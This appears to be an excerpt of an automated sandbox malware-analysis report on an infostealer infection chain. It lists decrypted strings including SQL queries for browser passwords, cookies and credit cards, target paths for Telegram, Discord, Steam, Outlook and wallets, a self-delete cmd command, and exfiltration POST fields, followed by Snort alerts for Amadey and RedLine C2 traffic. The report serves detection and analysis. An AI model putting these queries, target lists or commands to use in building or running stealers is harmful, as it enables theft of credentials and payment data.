                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: RegQueryValueExA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: RegEnumKeyExA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: RegOpenKeyExA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: RegCloseKey
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: RegEnumValueA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CryptBinaryToStringA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CryptUnprotectData
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SHGetFolderPathA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: ShellExecuteExA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: InternetOpenUrlA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: InternetConnectA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: InternetCloseHandle
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: InternetOpenA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: HttpSendRequestA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: HttpOpenRequestA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: InternetReadFile
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: InternetCrackUrlA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: StrCmpCA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: StrStrA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: StrCmpCW
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: PathMatchSpecA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetModuleFileNameExA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: RmStartSession
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: RmRegisterResources
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: RmGetList
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: RmEndSession
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: sqlite3_open
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: sqlite3_prepare_v2
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: sqlite3_step
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: sqlite3_column_text
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: sqlite3_finalize
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: sqlite3_close
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: sqlite3_column_bytes
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: sqlite3_column_blob
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: encrypted_key
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: PATH
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: NSS_Init
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: NSS_Shutdown
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: PK11_GetInternalKeySlot
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: PK11_FreeSlot
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: PK11_Authenticate
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: PK11SDR_Decrypt
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: C:\ProgramData\
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: browser:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: profile:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: url:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: login:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: password:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Opera
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: OperaGX
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Network
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: cookies
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: .txt
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: TRUE
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: FALSE
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: autofill
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SELECT name, value FROM autofill
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: history
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: name:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: month:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: year:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: card:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Cookies
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Login Data
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Web Data
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: History
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: logins.json
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: formSubmitURL
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: usernameField
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: encryptedUsername
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: encryptedPassword
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: guid
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: cookies.sqlite
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: formhistory.sqlite
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: places.sqlite
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: plugins
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Local Extension Settings
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Sync Extension Settings
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: IndexedDB
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Opera Stable
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Opera GX Stable
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CURRENT
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: chrome-extension_
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: _0.indexeddb.leveldb
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Local State
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: profiles.ini
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: chrome
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: opera
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: firefox
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: wallets
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: %08lX%04lX%lu
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: ProductName
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: ProcessorNameString
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: DisplayName
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: DisplayVersion
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Network Info:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - IP: IP?
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - Country: ISO?
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: System Summary:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - HWID:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - OS:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - Architecture:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - UserName:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - Computer Name:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - Local Time:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - UTC:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - Language:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - Keyboards:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - Laptop:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - Running Path:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - CPU:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - Threads:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - Cores:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - RAM:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - Display Resolution:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: - GPU:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: User Agents:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Installed Apps:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: All Users:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Current User:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Process List:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: system_info.txt
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: freebl3.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: mozglue.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: msvcp140.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: nss3.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: softokn3.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: vcruntime140.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: \Temp\
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: .exe
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: runas
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: open
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: /c start
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: %DESKTOP%
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: %APPDATA%
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: %LOCALAPPDATA%
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: %USERPROFILE%
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: %DOCUMENTS%
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: %PROGRAMFILES%
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: %PROGRAMFILES_86%
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: %RECENT%
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: *.lnk
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: files
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: \discord\
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: \Local Storage\leveldb
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: \Telegram Desktop\
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: key_datas
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: D877F783D5D3EF8C*
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: map*
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: A7FDF864FBC10B77*
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: A92DAA6EA6F891F2*
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: F8806DD0C461824F*
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Telegram
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: *.tox
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: *.ini
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Password
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: 00000001
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: 00000002
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: 00000003
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: 00000004
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: \Outlook\accounts.txt
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Pidgin
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: \.purple\
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: accounts.xml
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: dQw4w9WgXcQ
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: token:
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Software\Valve\Steam
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SteamPath
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: \config\
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: ssfn*
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: config.vdf
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: DialogConfig.vdf
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: libraryfolders.vdf
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: loginusers.vdf
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: \Steam\
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: sqlite3.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: browsers
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: done
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: soft
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: \Discord\tokens.txt
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: https
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: POST
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: HTTP/1.1
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Content-Disposition: form-data; name="
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: hwid
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: build
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: token
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: file_name
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: file
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: message
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: screenshot.jpg

                                Compliance

                                barindex
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeUnpacked PE file: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeUnpacked PE file: 42.2.svchost.exe.1b0000.0.unpack
                                Source: mlk3kK6uLZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:58984 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 15.235.80.22:443 -> 192.168.2.5:58992 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.5:59071 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.5:59079 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.5:59087 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.18.11.5:443 -> 192.168.2.5:59214 version: TLS 1.2
                                Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000014.00000002.2837675015.000000006C0CD000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000014.00000002.2838084537.000000006C28F000.00000002.00000001.01000000.00000017.sdmp
                                Source: Binary string: ntdll.pdb source: build16666.exe, 00000015.00000002.2732029264.000001662AFE0000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729447807.000001662A1E4000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2730244326.000001662A7E9000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2730481150.000001662A9EB000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729986189.000001662A5E4000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2731462760.000001662ADE9000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2730926078.000001662ABEF000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2742546399.000001662CBE3000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2735116835.000001662B9E8000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729694439.000001662A3EB000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2739098908.000001662C7E2000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2737730487.000001662C3E6000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2738483590.000001662C5E2000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2734502417.000001662B5E0000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2736372776.000001662BFE3000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2728871110.0000016629DE1000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729156228.0000016629FE6000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2743279212.000001662CDE7000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2740303581.000001662C9E8000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2736774582.000001662C1EA000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2735601672.000001662BBED000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2735992123.000001662BDEE000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2733319304.000001662B3EC000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2734791719.000001662B7E0000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2732670905.000001662B1E1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ntdll.pdbUGP source: build16666.exe, 00000015.00000002.2732029264.000001662AFE0000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729447807.000001662A1E4000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2730244326.000001662A7E9000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2730481150.000001662A9EB000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729986189.000001662A5E4000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2731462760.000001662ADE9000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2730926078.000001662ABEF000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2742546399.000001662CBE3000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2735116835.000001662B9E8000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729694439.000001662A3EB000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2739098908.000001662C7E2000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2737730487.000001662C3E6000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2738483590.000001662C5E2000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2734502417.000001662B5E0000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2736372776.000001662BFE3000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2728871110.0000016629DE1000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2729156228.0000016629FE6000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2743279212.000001662CDE7000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2740303581.000001662C9E8000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2736774582.000001662C1EA000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2735601672.000001662BBED000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2735992123.000001662BDEE000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2733319304.000001662B3EC000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2734791719.000001662B7E0000.00000004.00000020.00020000.00000000.sdmp, build16666.exe, 00000015.00000002.2732670905.000001662B1E1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000014.00000002.2838084537.000000006C28F000.00000002.00000001.01000000.00000017.sdmp
                                Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000014.00000002.2837675015.000000006C0CD000.00000002.00000001.01000000.00000018.sdmp
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: 4_2_00ABF79D FindFirstFileExW,4_2_00ABF79D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B6EA FindFirstFileExW,5_2_0041B6EA
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeCode function: 18_2_6C394E75 FindFirstFileExW,18_2_6C394E75
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 4x nop then jmp 07981F7Dh11_2_07981F5C
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeCode function: 4x nop then jmp 0798093Fh11_2_07980927

                                Networking

                                barindex
                                Source: TrafficSnort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:49704 -> 77.91.77.81:80
                                Source: TrafficSnort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 77.91.77.81:80 -> 192.168.2.5:49704
                                Source: TrafficSnort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49705 -> 77.91.77.81:80
                                Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.5:49710 -> 185.172.128.33:8970
                                Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.5:49710 -> 185.172.128.33:8970
                                Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 185.172.128.33:8970 -> 192.168.2.5:49710
